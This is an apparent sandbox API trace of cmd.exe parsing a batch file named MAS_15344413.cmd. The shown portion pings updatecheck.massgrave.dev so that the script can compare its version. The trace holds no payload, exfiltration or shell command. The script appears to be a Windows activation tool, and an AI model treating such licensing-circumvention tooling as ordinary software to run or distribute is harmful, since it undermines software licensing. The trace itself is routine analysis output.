[0178.452] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.452] GetProcessHeap () returned 0x19a8f1e0000 [0178.452] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0178.452] GetProcessHeap () returned 0x19a8f1e0000 [0178.452] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.452] GetProcessHeap () returned 0x19a8f1e0000 [0178.452] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0178.452] GetProcessHeap () returned 0x19a8f1e0000 [0178.453] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0178.453] _get_osfhandle (_FileHandle=3) returned 0xac [0178.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a9f [0178.453] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=6817, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1aa1 [0178.453] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt old=\r\nfor updates\r\n===================================================================================================================\r\n") returned 2 [0178.453] _get_osfhandle (_FileHandle=3) returned 0xac [0178.453] GetFileType (hFile=0xac) returned 0x1 [0178.453] _get_osfhandle (_FileHandle=3) returned 0xac [0178.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1aa1 [0178.453] GetProcessHeap () returned 0x19a8f1e0000 [0178.453] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.453] GetProcessHeap () returned 0x19a8f1e0000 [0178.454] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0178.454] _tell (_FileHandle=3) returned 6817 [0178.454] _close (_FileHandle=3) returned 0 [0178.454] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.455] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.455] _get_osfhandle (_FileHandle=3) returned 0xac [0178.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=6817, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1aa1 [0178.455] _get_osfhandle (_FileHandle=3) returned 0xac [0178.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1aa1 [0178.455] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=6904, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1af8 [0178.455] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"delims=[] tokens=2\" %%# in ('ping -4 -n 1 updatecheck.mass%-%grave.dev') do (\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims=[] tokens=2\" %%# in ('ping -4 -n 1 updatecheck.mass%-%grave.dev') do (\r\n===================================================\r\n") returned 87 [0178.455] _get_osfhandle (_FileHandle=3) returned 0xac [0178.455] GetFileType (hFile=0xac) returned 0x1 [0178.455] _get_osfhandle (_FileHandle=3) returned 0xac [0178.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1af8 [0178.455] GetProcessHeap () returned 0x19a8f1e0000 [0178.455] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.455] GetProcessHeap () returned 0x19a8f1e0000 [0178.455] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0178.456] GetProcessHeap () returned 0x19a8f1e0000 [0178.456] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec9a0 [0178.456] GetEnvironmentVariableW (in: lpName="-", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.456] _wcsicmp (_String1="-", _String2="CD") returned -54 [0178.456] _wcsicmp (_String1="-", _String2="ERRORLEVEL") returned -56 [0178.456] _wcsicmp (_String1="-", _String2="CMDEXTVERSION") returned -54 [0178.456] _wcsicmp (_String1="-", _String2="CMDCMDLINE") returned -54 [0178.456] _wcsicmp (_String1="-", _String2="DATE") returned -55 [0178.456] _wcsicmp (_String1="-", _String2="TIME") returned -71 [0178.456] _wcsicmp (_String1="-", _String2="RANDOM") returned -69 [0178.456] _wcsicmp (_String1="-", _String2="HIGHESTNUMANODENUMBER") returned -59 [0178.456] GetProcessHeap () returned 0x19a8f1e0000 [0178.456] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9a0) returned 1 [0178.456] GetProcessHeap () returned 0x19a8f1e0000 [0178.457] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.457] GetProcessHeap () returned 0x19a8f1e0000 [0178.458] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0178.458] _wcsicmp (_String1="for", _String2=")") returned 61 [0178.458] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0178.458] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0178.458] GetProcessHeap () returned 0x19a8f1e0000 [0178.458] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0178.458] GetProcessHeap () returned 0x19a8f1e0000 [0178.458] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8d60 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x1a) returned 0x19a8f1eb800 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x1a [0178.459] _wcsicmp (_String1="/L", _String2="/f") returned 6 [0178.459] _wcsicmp (_String1="/D", _String2="/f") returned -2 [0178.459] _wcsicmp (_String1="/F", _String2="/f") returned 0 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f8f00 [0178.459] _wcsicmp (_String1="/L", _String2="%#") returned 10 [0178.459] _wcsicmp (_String1="/D", _String2="%#") returned 10 [0178.459] _wcsicmp (_String1="/F", _String2="%#") returned 10 [0178.459] _wcsicmp (_String1="/R", _String2="%#") returned 10 [0178.459] _wcsicmp (_String1="IN", _String2="in") returned 0 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x22) returned 0x19a8f1eb860 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x22 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x28) returned 0x19a8f1eb8f0 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x28 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x2c) returned 0x19a8f1e0a30 [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.459] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0a30) returned 0x2c [0178.459] GetProcessHeap () returned 0x19a8f1e0000 [0178.460] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0a30, Size=0x62) returned 0x19a8f1eaed0 [0178.460] GetProcessHeap () returned 0x19a8f1e0000 [0178.460] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x62 [0178.460] _wcsicmp (_String1="DO", _String2="do") returned 0 [0178.460] GetProcessHeap () returned 0x19a8f1e0000 [0178.460] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0178.460] _get_osfhandle (_FileHandle=3) returned 0xac [0178.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1af8 [0178.460] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0178.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=7019, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6b [0178.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n", cbMultiByte=115, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if not [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 115 [0178.460] _get_osfhandle (_FileHandle=3) returned 0xac [0178.460] GetFileType (hFile=0xac) returned 0x1 [0178.460] _get_osfhandle (_FileHandle=3) returned 0xac [0178.460] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6b [0178.460] GetProcessHeap () returned 0x19a8f1e0000 [0178.460] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.461] GetProcessHeap () returned 0x19a8f1e0000 [0178.461] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0178.461] GetProcessHeap () returned 0x19a8f1e0000 [0178.461] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0178.461] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0178.461] GetProcessHeap () returned 0x19a8f1e0000 [0178.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.461] GetProcessHeap () returned 0x19a8f1e0000 [0178.462] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.462] GetProcessHeap () returned 0x19a8f1e0000 [0178.462] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0178.462] GetProcessHeap () returned 0x19a8f1e0000 [0178.462] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6e0 [0178.462] GetEnvironmentVariableW (in: lpName="masver", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3 [0178.462] GetProcessHeap () returned 0x19a8f1e0000 [0178.462] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0178.462] GetProcessHeap () returned 0x19a8f1e0000 [0178.463] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.463] GetProcessHeap () returned 0x19a8f1e0000 [0178.463] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0178.463] GetProcessHeap () returned 0x19a8f1e0000 [0178.463] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0178.463] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0178.463] GetProcessHeap () returned 0x19a8f1e0000 [0178.463] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0178.463] GetProcessHeap () returned 0x19a8f1e0000 [0178.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.464] GetProcessHeap () returned 0x19a8f1e0000 [0178.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0178.465] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0178.465] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0178.465] _wcsicmp (_String1="IF", _String2="if") returned 0 [0178.465] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec960 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb860 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x1a) returned 0x19a8f1eb740 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb740) returned 0x1a [0178.465] _wcsicmp (_String1="not", _String2="/I") returned 63 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6a0 [0178.465] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0178.465] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0178.465] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0178.465] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0178.465] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0178.465] GetProcessHeap () returned 0x19a8f1e0000 [0178.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0178.466] _wcsicmp (_String1="ERRORLEVEL", _String2="[%#]") returned 10 [0178.466] _wcsicmp (_String1="EXIST", _String2="[%#]") returned 10 [0178.466] _wcsicmp (_String1="CMDEXTVERSION", _String2="[%#]") returned 8 [0178.466] _wcsicmp (_String1="DEFINED", _String2="[%#]") returned 9 [0178.466] _wcsicmp (_String1="NOT", _String2="[%#]") returned 19 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb9e0 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1eca40 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0178.466] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0178.466] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0178.466] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0178.466] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0178.466] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0178.466] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6b0 [0178.466] GetProcessHeap () returned 0x19a8f1e0000 [0178.466] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0178.466] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0178.466] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0178.466] _wcsicmp (_String1="IF", _String2="find") returned 3 [0178.466] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0178.467] _wcsicmp (_String1="REM", _String2="find") returned 12 [0178.467] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb980 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b30 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec920 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb950 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0178.467] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0178.467] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0178.467] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0178.467] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0178.467] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0178.467] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.467] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0178.467] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6e0 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0178.468] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0178.468] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0178.468] _wcsicmp (_String1="IF", _String2="find") returned 3 [0178.468] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0178.468] _wcsicmp (_String1="REM", _String2="find") returned 12 [0178.468] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0ef0 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0bb0 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd00 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0f30 [0178.468] GetProcessHeap () returned 0x19a8f1e0000 [0178.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0178.468] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0178.468] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0178.468] _wcsicmp (_String1="IF", _String2="set") returned -10 [0178.468] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0178.468] _wcsicmp (_String1="REM", _String2="set") returned -1 [0178.469] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0178.469] GetProcessHeap () returned 0x19a8f1e0000 [0178.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0178.469] GetProcessHeap () returned 0x19a8f1e0000 [0178.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecae0 [0178.469] GetProcessHeap () returned 0x19a8f1e0000 [0178.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1efcd0 [0178.469] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0178.469] _get_osfhandle (_FileHandle=3) returned 0xac [0178.469] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6b [0178.469] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0178.469] SetFilePointer (in: hFile=0xac, lDistanceToMove=7022, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6e [0178.469] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nnot [%%#]==[] (echo \"%%#\" | find \"127.69\" %nul1% && (echo \"%%#\" | find \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 3 [0178.469] _get_osfhandle (_FileHandle=3) returned 0xac [0178.469] GetFileType (hFile=0xac) returned 0x1 [0178.469] _get_osfhandle (_FileHandle=3) returned 0xac [0178.469] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b6e [0178.469] GetProcessHeap () returned 0x19a8f1e0000 [0178.469] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.470] GetProcessHeap () returned 0x19a8f1e0000 [0178.470] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0178.471] _tell (_FileHandle=3) returned 7022 [0178.471] _close (_FileHandle=3) returned 0 [0178.471] GetProcessHeap () returned 0x19a8f1e0000 [0178.471] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8c40 [0178.471] GetProcessHeap () returned 0x19a8f1e0000 [0178.471] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1eca80 [0178.471] GetProcessHeap () returned 0x19a8f1e0000 [0178.471] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd20 [0178.471] GetProcessHeap () returned 0x19a8f1e0000 [0178.471] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1eca60 [0178.471] _wcsnicmp (_String1="delims=[", _String2="usebackq", _MaxCount=0x8) returned -17 [0178.471] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0178.471] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0178.471] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0178.471] GetProcessHeap () returned 0x19a8f1e0000 [0178.471] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca60) returned 1 [0178.472] GetProcessHeap () returned 0x19a8f1e0000 [0178.472] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecd40 [0178.472] _wcsnicmp (_String1="tokens=2", _String2="usebackq", _MaxCount=0x8) returned -1 [0178.472] _wcsnicmp (_String1="tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0178.472] _wcsnicmp (_String1="toke", _String2="eol=", _MaxCount=0x4) returned 15 [0178.472] _wcsnicmp (_String1="tokens=", _String2="delims=", _MaxCount=0x7) returned 16 